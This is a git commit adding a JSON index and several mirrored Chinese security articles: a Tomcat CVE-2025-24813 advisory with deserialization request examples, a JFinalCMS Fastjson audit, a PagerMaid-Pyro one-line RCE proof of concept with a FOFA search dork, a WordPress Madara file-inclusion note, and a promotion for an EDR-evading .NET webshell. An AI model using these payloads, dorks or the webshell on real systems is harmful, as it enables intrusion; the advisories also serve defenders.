当漏洞成为“数字战争”的弹药,谁能改写攻防规则?、首次利用OpenAI o3模型发现Linux内核零日漏洞 | Palo Alto公布千亿营收冲刺计划,网络安全迈向平台化寡头竞争、实战SRC挖掘|微信小程序渗透漏洞复盘、等保测评10大高频漏洞:谁将SQL注入挤下神坛?、黑客利用 0day 漏洞通过 Commvault 入侵美国云平台、挖洞日记 | 记一次轻松拿下统一小通杀漏洞、2025攻防演练必修高危漏洞集合(2.0版)、WebShell 绕过 EDR 监控,不调用 cmd 也能实现命令执行、Apache Tomcat 9.8分RCE漏洞曝光,PoC 已经公开、研究者利用OpenAI o3模型发现Linux内核远程零日漏洞、Java代码审计 | JFinalCMS 5.1,通过反射调用 FastJson 漏洞触发点,有趣。、西班牙汉堡王备份系统遭遇RCE漏洞威胁,黑客4000美元叫卖访问权限。、漏洞挖掘必备利器推荐、白盒Sign加密到前台SQL注入漏洞、WordPress Madara 本地文件包含漏洞 (CVE-2025-4524)、记一次实战小程序漏洞测试到严重漏洞、PagerMaid-Pyro run_sh-rce命令执行漏洞、黑客发起全球间谍行动,政府邮箱被利用XSS漏洞入侵、【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防、Zer0 Sec团队-某SRC任意文件读取漏洞挖掘案例、发现与 IXON VPN 客户端相关的三个新漏洞,可导致本地权限提升 (LPE)、

This commit is contained in:
test 2025-05-27 08:27:09 +00:00
parent 031d165cb6
commit 8cc7494c46
22 changed files with 2697 additions and 131 deletions

View File

@ -14471,5 +14471,26 @@
"https://mp.weixin.qq.com/s?__biz=Mzg3ODE2MjkxMQ==&mid=2247491671&idx=1&sn=c5f692e69aee368494586d30ac95d47b": "全新下一代目录爆破扫描工具,一个全方位的目录爆破的解决方案|漏洞探测",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247490133&idx=1&sn=ddd170b9cadad60d41c6581c82f3c8ac": "【漏洞预警】新华三Gr-5400ax缓冲区溢出漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503427&idx=1&sn=68e2ee9124e84ee0b05694b0952cec7f": "安全热点周报Ivanti EPMM 远程代码执行漏洞已被利用于有限的攻击中",
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486487&idx=1&sn=3889ebfbd2f4edc0c3901392d6ce9585": "白盒Sign加密到前台SQL注入漏洞"
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486487&idx=1&sn=3889ebfbd2f4edc0c3901392d6ce9585": "白盒Sign加密到前台SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkxMTIyMjg0NQ==&mid=2247495770&idx=1&sn=bf9b4d19d561f3a167dd614346a65b4f": "当漏洞成为“数字战争”的弹药,谁能改写攻防规则?",
"https://mp.weixin.qq.com/s?__biz=MzI1OTA1MzQzNA==&mid=2651248030&idx=1&sn=1843664c0aeac8f18ff074f0e9ec2092": "首次利用OpenAI o3模型发现Linux内核零日漏洞 | Palo Alto公布千亿营收冲刺计划网络安全迈向平台化寡头竞争",
"https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247490772&idx=1&sn=91e17e7d01c13ca1a0cb4f15eccf1d69": "实战SRC挖掘微信小程序渗透漏洞复盘",
"https://mp.weixin.qq.com/s?__biz=MzIwMzIyMjYzNA==&mid=2247518969&idx=1&sn=7783174861ed4ff1671378b9289992b8": "等保测评10大高频漏洞谁将SQL注入挤下神坛",
"https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649795241&idx=1&sn=8c0be31950ee1caba4515bd8c6e78567": "黑客利用 0day 漏洞通过 Commvault 入侵美国云平台",
"https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247550223&idx=1&sn=080537e5dae12585a760656d296060ee": "挖洞日记 | 记一次轻松拿下统一小通杀漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIwMjcyNzA5Mw==&mid=2247495068&idx=1&sn=0103937e748038484a8b0477280bfba1": "2025攻防演练必修高危漏洞集合2.0版)",
"https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247499748&idx=3&sn=f1d9403b08dbf8776ad839cb85b4a94f": "WebShell 绕过 EDR 监控,不调用 cmd 也能实现命令执行",
"https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649795241&idx=2&sn=1d6d27a7a4709b3fe42e178e6a36ca8f": "Apache Tomcat 9.8分RCE漏洞曝光PoC 已经公开",
"https://mp.weixin.qq.com/s?__biz=MzkzMTYyMDk1Nw==&mid=2247483869&idx=1&sn=2d72368d0c27aad90b94fc523069a699": "研究者利用OpenAI o3模型发现Linux内核远程零日漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg3MDU1MjgwNA==&mid=2247487425&idx=1&sn=b463a6fd6d2a6b341874eeb038c16044": "Java代码审计 | JFinalCMS 5.1,通过反射调用 FastJson 漏洞触发点,有趣。",
"https://mp.weixin.qq.com/s?__biz=MzIwNzAwOTQxMg==&mid=2652251917&idx=1&sn=c14ea2340b3bf7692b029ded8d2084cc": "西班牙汉堡王备份系统遭遇RCE漏洞威胁黑客4000美元叫卖访问权限。",
"https://mp.weixin.qq.com/s?__biz=MzU4OTg4Nzc4MQ==&mid=2247506144&idx=1&sn=0c45651d114b0ae75e3c28b22524ef6a": "漏洞挖掘必备利器推荐",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247491219&idx=1&sn=971cf60237ff3d69e0428ef50a39f2fc": "白盒Sign加密到前台SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491608&idx=1&sn=2dfeb11acdab967374f23e43c25dcc1c": "WordPress Madara 本地文件包含漏洞 (CVE-2025-4524)",
"https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247526415&idx=1&sn=99f277b93b1a927837ff376f50d001af": "记一次实战小程序漏洞测试到严重漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzk1Nzg3ODkyNg==&mid=2247484110&idx=1&sn=0d12f8dc81d838679c88fcd84e2cad8e": "PagerMaid-Pyro run_sh-rce命令执行漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzMzE5OTQzMA==&mid=2247486753&idx=1&sn=3abdaa3b245cc30c92e6322dcc3f1c70": "黑客发起全球间谍行动政府邮箱被利用XSS漏洞入侵",
"https://mp.weixin.qq.com/s?__biz=MzkyOTQ0MjE1NQ==&mid=2247499635&idx=1&sn=cca778a3a8b5c545de9edc8d2a4f2c92": "【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防",
"https://mp.weixin.qq.com/s?__biz=MzkyNzg4NTU0NQ==&mid=2247485589&idx=1&sn=308a44fe96ac6e8ca80a8e1f5d0f5b56": "Zer0 Sec团队-某SRC任意文件读取漏洞挖掘案例",
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247530229&idx=3&sn=70f3209757ed00e0906074d10d488d38": "发现与 IXON VPN 客户端相关的三个新漏洞,可导致本地权限提升 (LPE)"
}

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,100 @@
# Apache Tomcat 9.8分RCE漏洞曝光PoC 已经公开
会杀毒的单反狗 军哥网络安全读报 2025-05-27 01:11
**导****读**
在广泛使用的开源 Java servlet 容器和 Web 服务器 Apache Tomcat 中发现了一个严重安全漏洞编号为CVE-2025-24813 。
该漏洞源于对文件路径的不当处理特别是包含内部点例如file.Name的文件路径可能允许攻击者绕过安全控制从而导致远程代码执行RCE、信息泄露和恶意内容注入。
该漏洞影响 Tomcat 版本11.0.0-M1 至 11.0.2、10.1.0 - M1 至 10.1.34以及9.0.0.M1至 9.0.98。Apache已在11.0.3、10.1.35和9.0.99版本中发布了补丁来解决此问题。
CVE-2025-24813源于Tomcat 默认 servlet 中的路径等效问题,在某些配置下,该问题会错误处理通过 HTTP PUT 请求的文件上传。
![](https://mmbiz.qpic.cn/mmbiz_png/AnRWZJZfVaHjxGD6u56cVoOOcCGj6Okuc9mHOTZ9IeUtIicjEsLJctpJTCF4I88RDIFy5ks1ps43ibJlMZn6CZ3A/640?wx_fmt=png&from=appmsg "")
在以下情况下,此漏洞可被利用:
- 默认 servlet 的readonly参数设置为false(write enabled)。
- Content-Range允许部分 PUT 请求(使用标头)(默认启用)。
- Tomcat 配置为基于文件的会话持久性(非默认)。
- 该应用程序包含易受反序列化攻击的库。
- 攻击者知道敏感文件的命名约定和位置。
###
### 漏洞利用步骤
###
1.
上传恶意会话文件:
攻击者发送一个 PUT 请求,其中包含精心设计的 Java 序列化有效载荷,目标为会话存储目录。
例如文本PUT /webapps/ROOT/WEB-INF/sessions/SESSIONID.ser HTTP/1.1 Host: vulnerable-tomcat Content-Range: bytes 0-99/100 Content-Type: application/octet-stream <malicious serialized payload>
2.
触发反序列化和 RCE
攻击者随后发送一个 GET 请求其中JSESSIONID包含引用上传的会话文件的 cookie
文本GET / HTTP/1.1 Host: vulnerable-tomcat Cookie: JSESSIONID=SESSIONID当 Tomcat 反序列化恶意会话文件时,任意代码都会在 Tomcat 进程的权限下执行。
### 风险因素及其影响
###
虽然该漏洞很严重CVSS 9.8/10但利用该漏洞需要非默认配置 - 具体来说,就是启用写入的默认 servlet 和基于文件的会话持久性。
概念验证
(Po
C
)
代码已经公开,研究人员在漏洞披露后 30 小时内就观察到了攻击利用。
潜在影响包括:
- 远程代码执行RCE
- 未经授权访问敏感文件
- 将恶意内容注入上传的文件中
- 服务器配置文件损坏
- 网络内的数据泄露和横向移动
###
### 缓解措施和建议
###
应立即采取的缓解措施:
- 将 Apache Tomcat  升级到11.0.3、10.1.35或9.0.99。
- 保持默认 servlet  的readonly参数设置为true阻止通过 PUT 进行写访问)。
- 如果不需要,请禁用部分 PUT 请求。
- 避免基于文件的会话持久性或将可写目录与会话存储隔离。
- 从类路径中删除不必要的反序列化库。
无法立即升级的组织应应用所有配置强化步骤并监控异常的 PUT 和会话活动。
鉴于 Tomcat 的普遍性,研究人员建议快速修补漏洞,立即行动对于防止攻击至关重要。
参考链接:
https://cyble.com/blog/cert-nz-warns-of-cve-2025-24813-in-tomcat/
新闻链接:
https://gbhackers.com/apache-tomcat-rce-vulnerability/
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "")
扫码关注
军哥网络安全读报
**讲述普通人能听懂的安全故事**

View File

@ -0,0 +1,125 @@
# Java代码审计 | JFinalCMS 5.1,通过反射调用 FastJson 漏洞触发点,有趣。
原创 领家小明 闪石星曜CyberSecurity 2025-05-27 03:38
内部学员投稿。
首发于闪石星曜CyberSecurity。
我公开了一份面向零基础小白的 JavaWeb代码审计入门文档。
欢迎一起来学习,感觉不错别忘了分享给身边的好哥们。
```
https://www.yuque.com/power7089/ekvyga
```
# 正文
JFinal_CMS 5.1 版本下面存在一个有趣的 Fastjson 漏洞触发点。
Github 定位 Issues: https://github.com/jflyfox/jfinal_cms/issues/60
下面我们通过上述 Issues来进行代码分析。
通过上面的漏洞Issues明确的知道了漏洞点在哪。
也就是这处 API 是有漏洞的,具体漏洞点事 P 参数。
```
/api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p={siteId:1}
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5c4c0YkibALFbs9qu58qXUibibOibwic4YumOgnPYlPDdCHicQBR8KufibUFqw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5H0fQOmHEbnJFibT7t3sycuJdrFoB0xW0IbjmtbeK3yq04NBBbShVPIg/640?wx_fmt=png&from=appmsg "")
漏洞代码审计分析,核心流程如下: 1、正向搜索JSON.parseObject
可以找到getParams
方法-----> get(String key)
------> getInt(String key)
-----> ApiV100Logic
使用过form.getInt("siteId")
的方法的全部都存在 Fastjson反序列化漏洞ApiV100Logic
向上找不到直接传参的入口,实际上是根据反射过来的。
2、反射链条api.controller
类中action
方法,----> service.action(from)
方法----> (ApiResp) ReflectionUtils.invokeMethod
方法根据action名
称反射调用。
代码审计分析: 
全局搜索 Fastjson 触发反序列化的漏洞点:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB50YiaoALXs867VUI4BSOJLSF5qMia2Y4xyvbiaetI0d5Miaeu0TUShSuJsw/640?wx_fmt=png&from=appmsg "")
找到getParams方法。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5MN29Z1icEj3N0mibnpu83bhzNialyjcUsFG9RMyMFAofBJbWuG5KJlFNw/640?wx_fmt=png&from=appmsg "")
向上找调用链发现get(String key)方法存在调用。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5ibmdEj4Hkjulo8ialK6Upm46HNV0kImGhX7wYebcB7hC6QI0DjFwnfKw/640?wx_fmt=png&from=appmsg "")
向上找调用链发现getInt(String key)方法存在调用。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5NJHIslaTaWC5tdJPejHB2Jiceoq520nm2RrS3KaapHGxKV4JSva654A/640?wx_fmt=png&from=appmsg "")
![]( "")
搜索ApiV100Logic向上找不到调用链进一步探索该系统架构发现其实是根据反射过来的。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5pflhYGsCl6ez9OP0J27CBPYzj9U8OLAWzWJ3bxyYuB3m9WxuIbbINQ/640?wx_fmt=png&from=appmsg "")
下面分析反射调用链
搜索/api/action
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5MvhLa9nP6oVxAonZBKibMnupax0m8qbwmw0HNKQPicGiaCY101YvFiaUIA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB50gLZXcL4ktHykeqhyYn91tEJdGCACJyH4eiaN30ib0SvOj0PcxdSLUIQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5rBwrqFnBhvuGNrzHjxdp9m5ZtqhpkSWhaGIiaq5yoHOeO3dc5yniaURQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/FFcgFn6WVc2Zqes79oHX5yUqfVibajJB5olRFgPwQoD5jbFlXeCria3SiblXq1pHWryFlSllATpHIz3uWlCyxIxgA/640?wx_fmt=png&from=appmsg "")
然后接下来就是走 form.getInt 的流程导致反序列化,衔接到了上面讲的 Fastjson 反序列化漏洞点触发。
这个漏洞的本质在于入口非常规寻找接口的方式,而是使用的反射的形式获取到该接口,从而连接上了 Fastjson 漏洞点,构成了一条完整的漏洞触发链。
所以,在寻找漏洞点到入口这个分析阶段,每个系统都有不同的情况,不同的场景,需要我们根据当下系统情况,进一步分析。不能完全一味地只看 Controller 层代码。
# 更多内容
> 学Java代码审计就找闪石星曜CyberSecurity手把手带你
> 视频培训课程详情可点击下方链接了解,六十多节实战课,低至 499。
> 2025 版部分课程进行了重新讲解,并新增了不少内容。
[《JavaWeb代码审计企业级项目实战》课程2.0升级版新增10节实战课依旧低至499加量不加价招生](https://mp.weixin.qq.com/s?__biz=Mzg3MDU1MjgwNA==&mid=2247487386&idx=2&sn=fc36f768e8715e1b0c291519e7dad584&scene=21#wechat_redirect)
> 如果你想找个代码审计内部社区,欢迎加入【炼石计划@赛博代审之旅】以原创系列教程为主,代码审计资源为辅,打造一个专业的代码审计内部社区,已有 2000 多人加入!
> 更多代码审计资料整理中,现在加入就能回本!
> 仅需 99元一年续费仅需 25元一年。
> 两杯奶茶钱就能投资自己学习代码审计知识!
[2025 年,炼石计划@赛博代审之旅又带来了什么好东西呢?](https://mp.weixin.qq.com/s?__biz=Mzg3MDU1MjgwNA==&mid=2247487164&idx=1&sn=ee4ecadbaa3c2616b6e600c1711926e0&scene=21#wechat_redirect)

View File

@ -0,0 +1,20 @@
# PagerMaid-Pyro run_sh-rce命令执行漏洞
清晨 摸鱼划水 2025-05-27 02:17
FOFA
```
"PagerMaid-Pyro"
```
POC
```
/pagermaid/api/run_sh?cmd=id
```
![](https://mmbiz.qpic.cn/mmbiz_png/qJ5apkMXic82W6aLgicAkeVDgjcl7QKFfvbgmdrUgL2YJUX59sNwsgHcAj4XUXcfibLUExQomKrp5Ah2lfFNiaXg5w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qJ5apkMXic82W6aLgicAkeVDgjcl7QKFfvAibO2eDiaiaXqmIVpvY7pbyMyp6HpQ9hBQQPwgnMhcibaKicjXK4jsbubYg/640?wx_fmt=jpeg&from=appmsg "")

View File

@ -0,0 +1,177 @@
# WebShell 绕过 EDR 监控,不调用 cmd 也能实现命令执行
专攻.NET安全的 dotNet安全矩阵 2025-05-27 00:20
![图片](https://mmbiz.qpic.cn/mmbiz_gif/NO8Q9ApS1YibJO9SDRBvE01T4A1oYJXlTBTMvb7KbAf7z9hY3VQUeayWI61XqQ0ricUQ8G1FykKHBNwCqpV792qg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
在红队渗透环境中,
攻防对抗的深度不断升级,安全厂商纷纷将注意力从传统病毒特征识别,转向对行为链的监控和阻断。
红队常用的 cmd.exe
 指令执行方式在越来越多的场景中被标记为高危操作。即便你伪装得再好只要触发了这一调用链如EDR、HIDS就可能进行阻断、弹窗、甚至自动封禁进程。
WebShell
 场景下系统命令执行成为重点监控对象w3wp.exe
 进程直接调用 cmd.exe
、powershell.exe
、regsvr32.exe
 等系统工具,几乎都逃不过终端检测与告警。
**01. 工具基本介绍**
Sharp4WebCmd
 是一款用 .NET 编写的 不依赖 cmd.exe 的 Web 指令执行工具
。本质上是一个 .aspx
 页面但其内部并不调用传统的 cmd.exe
 进行命令执行,而是**通过底层 Windows API 函数自行实现命令解释、创建子进程、重定向输出等核心功能**
![](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8rowxwfhPPkrny0DyicicyZpvia7B5yOIdWaaJYIa3X2OCxyf1eLibjp8VBZorlhNfQLh48IU42pBosw/640?wx_fmt=jpeg&from=appmsg "")
这种方式从行为上规避了 cmd.exe
 的调用路径,使得工具在某些 EDR 环境中具有极强的低特征执行能力,适合部署于目标服务器的 IIS 环境中,以实现更加隐蔽的命令控制。
**02. 工具实战用法**
其核心绕过点在于让防护软件看不到cmd.exe而又能完成相同的执行任务。
## 2.1 核心原理
传统 WebShell 调用命令的方式通常如下,
该调用路径非常直接,因此在行为树中极易被安全软件识别:
```
Process.Start("cmd.exe","/c whoami");
```
Sharp4WebCmd 的策略是:利用 Windows 等底层 API 自行构造执行环境;实现类似 cmd 的参数解析与子进程管理;避免创建 cmd.exe 进程,直接执行系统命令;可选重定向输出,通过 HTTP 返回命令执行结果。
## 2.2 部署方式
将编译后的 Sharp4WebCmd.aspx
 页面上传到目标服务器的 Web 根目录或子目录下,访问页面时,通过 GET 参数传入命令内容:
```
http://<目标地址>/Sharp4WebCmd.aspx?c=whoami%20/all
```
参数 c
 表示要执行的系统命令;页面返回值即为命令执行结果,通常为纯文本格式,如下图所示。
![](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1Y8rowxwfhPPkrny0DyicicyZpqowj8aLzWAMu0RY2VGbYGr1CohGAib0MGORE5a9oO1TBqAayFRs0TicQ/640?wx_fmt=png&from=appmsg "")
在安全设备的日志中,你可能会发现 并无 cmd.exe 启动痕迹,也不容易构建出完整的进程调用链。
上,**Sharp4WebCmd**
 是一款技术上巧妙、战术上实用的 Web 指令执行工具。它通过规避对系统 cmd.exe
 的直接依赖,在对抗日益智能的行为检测时提供了一条全新的绕行路线。
对于红队而言,这是一种值得深入研究与灵活应用的攻击方式;而对于蓝队来说,也正提醒着防御策略不能仅依赖于进程路径特征,还需关注命令执行的本质行为与上下文链路。文章涉及的工
具已
打包在星球,感兴趣的朋友可以加入自取。
**03.NET安全扩展学习**
以上相关的知识点已收录于
新书《.NET安全攻防指南》全书共计25章总计1010页分为上下册横跨.NET Web代码审计与红队渗透两大领域。
**上册深入剖析.NET Web安全审计的核心技术帮助读者掌握漏洞发现与修复的精髓下册则聚焦于.NET逆向工程与攻防对抗的实战技巧揭秘最新的对抗策略与技术方法。**
**04. 技术精华内容**
从漏洞分析到安全攻防,我们涵盖了 .NET 安全各个关键方面,为您呈现最新、最全面的 .NET 安全知识,下面是公众号发布的精华文章集合,推荐大伙阅读!
[](https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247499267&idx=2&sn=1462cf23c9a8568cc80705d2d3a1a69e&scene=21#wechat_redirect)
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8A7Qhn1ssuqNzv0iceS7ZhOuZ0AO4P1eFeG2xTdR2V6GWibiaxO2RenUJzrwOfvsdqofibI6H2uY0CLQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247493952&idx=4&sn=db68011fb075c1d02268811163646b53&chksm=fa5947adcd2ecebbb1ca6659f289a5e344e37d1136fe0bd9272b5578e4c71bb19bb250e934d3&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247495167&idx=1&sn=9280c55fdc7c9146e549be470cf9f120&chksm=fa594312cd2eca04bfe8fd1fd3890b389d9c700b9b69d897f919addac399bab4f4d2e55f6b4f&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490722&idx=2&sn=c9807daa5548e139a0c67303cb26882a&chksm=fa5ab24fcd2d3b59a85be03e69c655ffd644e8458bc2ec3f572da4b40b43e5003fda756f35b4&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490703&idx=2&sn=e7db1ff662e5b41d9a1806fbdf33e204&chksm=fa5ab262cd2d3b7470f029b9a07d1dd3611e63be910b01a601144efe7d84b5f016f488a354cf&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490700&idx=2&sn=e8a865ada7c743e77fb9e953c5da74b1&chksm=fa5ab261cd2d3b7736387eddfc8524a378a1604552d0c9b55476646f9e8275f48818aab8acad&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247488736&idx=2&sn=d24aaa297c51eb620ccdf67af513086d&chksm=fa5aba0dcd2d331bbb22f3f5657199d718c90efed42fcb9cb67ec23d342f887c117e4858f1cb&scene=21#wechat_redirect)
**05. 加入安全社区**
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最专业的技术知识库之一 **1200+**
 成员一起互动学习。星球主题数量近 **600+**
,精华主题 
230+
PDF文档和压缩包 
300+ 
。从Web应用到PC端软件应用无论您是初学者还是经验丰富的开发人员都能在这里找到对应的实战指南和最佳实践。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y9AiaXibTRdEnEfYuQx76FjZVjmyEWtIaDuDePFFmyRqggiaq2k47pLoib9GZtUCOhaP40WPlhvbiaKZVg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 20+专栏文章
星球文化始终认为授人以鱼不如授人以渔!星球整理出**20+**
个专题栏目涵盖 **.NET安全 点、线、面、体等知识范围**
,助力师傅们实战攻防!其中主题包括.NET  内网攻防、漏洞分析、内存马、代码审计、预编译、反序列化、WebShell免杀、命令执行、工具库等等。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopa90SJRuwnLy9uZV4icrXiaZlJPQlYJWXTw8HCrF9oTcE3DDgrdFnXo2BA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 海量资源和工具
截至当前dot.Net安全矩阵星球社区汇聚了 
**600+**
 个实用工具和高质量PDF学习资料。这些资源涵盖了攻防对抗的各个方面在实战中能够发挥显著作用为对抗突破提供强有力的支持。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopaqVZW8XsALVA4FNiaj32q8npN82VSeqSKb4fQvLiczFNs0099VRFVQwPA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopa63ZXbX3YXLwoeNnjStcRtTbU9hoe6ecO5hhkj2apG1I6tKlkpz5GaQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 专属成员交流群
我们还有多个成员专属的
**内部星球陪伴群**
,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
![图片](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopaAiaouHb6HYza539m9v0ykDoD2JezaArDZBPlJInuabf6XsduzVcjZ0Q/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 已入驻的大咖们
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题社区中发布很多
**高质量的.NET安全资源**
,可以说市面上很少见,都是干货。
![图片](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1YibEkb2HkMVuw4d7qjcTYUtl04w8xDiaUaJxticro644uWw5XuJ6ZXCNXCticjYWjpXNmp3omQHUNFRPg/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
## 欢迎加入我们
dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术定位于高质量安全攻防星球社区也得到了许多师傅们的支持和信任通过星球深度连接入圈的师傅们一起推动.NET安全高质量的向前发展。
**星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!**
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopag09JtYcKpucjZPAlfeqC1ovcQvhrkemAzbURDaVF3InmpQshiatDnyQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,111 @@
# WordPress Madara 本地文件包含漏洞 (CVE-2025-4524)
Superhero Nday Poc 2025-05-27 06:48
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的
POC
信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失均由使用者本人负责公众号Nday Poc及作者不为此承担任何责任一旦造成后果请自行承担
**01**
**漏洞概述**
适用于 WordPress 的漫画网站主题的 Madara 响应式和现代 WordPress 主题在包括 2.2.2 在内的所有版本中都容易受到通过“template”参数包含本地文件的影响。这使得未经身份验证的攻击者可以在服务器上包含和执行任意文件从而允许执行这些文件中的任何 PHP 代码。这可用于绕过访问控制、获取敏感数据,或在可以上传和包含图像和其他“安全”文件类型的情况下实现代码执行。
**02******
**搜索引擎**
FOFA:
```
body="/wp-content/plugins/madara/"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLlL2Hn3yWFDibrjKKibZxogVMpfU5YEEPayicGvQEaAN2gNwd7bTdLkjLf0uIonPeAr5SXicR5LWq8Nw/640?wx_fmt=png&from=appmsg "")
**03******
**漏洞复现**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLlL2Hn3yWFDibrjKKibZxogVtxChMY0e7mpT0HWQvpoyQWia1g6zCO3ticQmcqgXW2dnJNcj6rqn5vUw/640?wx_fmt=png&from=appmsg "")
**04**
**自查工具**
nuclei
